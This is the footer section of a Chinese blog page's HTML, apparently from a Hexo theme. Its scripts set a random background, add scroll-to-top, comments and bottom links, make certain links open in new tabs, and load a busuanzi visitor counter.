<script data-main="/js/main.js" src="//cdn.bootcss.com/require.js/2.2.0/require.min.js"></script>

    <script>
        $(document).ready(function() {
            var iPad = window.navigator.userAgent.indexOf('iPad');
            if (iPad > -1 || $(".left-col").css("display") === "none") {
                var bgColorList = ["#9db3f4", "#414141", "#e5a859", "#f5dfc6", "#c084a0", "#847e72", "#cd8390", "#996731"];
                var bgColor = Math.ceil(Math.random() * (bgColorList.length - 1));
                $("body").css({"background-color": bgColorList[bgColor], "background-size": "cover"});
            }
            else {
                var backgroundnum = 5;
                var backgroundimg = "url(/background/bg-x.jpg)".replace(/x/gi, Math.ceil(Math.random() * backgroundnum));
                $("body").css({"background": backgroundimg, "background-attachment": "fixed", "background-size": "cover"});
            }
        })
    </script>





<div class="scroll" id="scroll">
    <a href="#" title="返回顶部"><i class="fa fa-arrow-up"></i></a>
    <a href="#comments" onclick="load$hide();" title="查看评论"><i class="fa fa-comments-o"></i></a>
    <a href="#footer" title="转到底部"><i class="fa fa-arrow-down"></i></a>
</div>
<script>
    // Open in New Window
    
        var oOpenInNew = {
            
            
            
            
            
            
             archives: ".archive-article-title", 
             miniArchives: "a.post-list-link", 
            
             friends: "#js-friends a", 
             socail: ".social a" 
        }
        for (var x in oOpenInNew) {
            $(oOpenInNew[x]).attr("target", "_blank");
        }
    
</script>

<script async src="https://dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js">
</script>
  </div>
</body>
</html>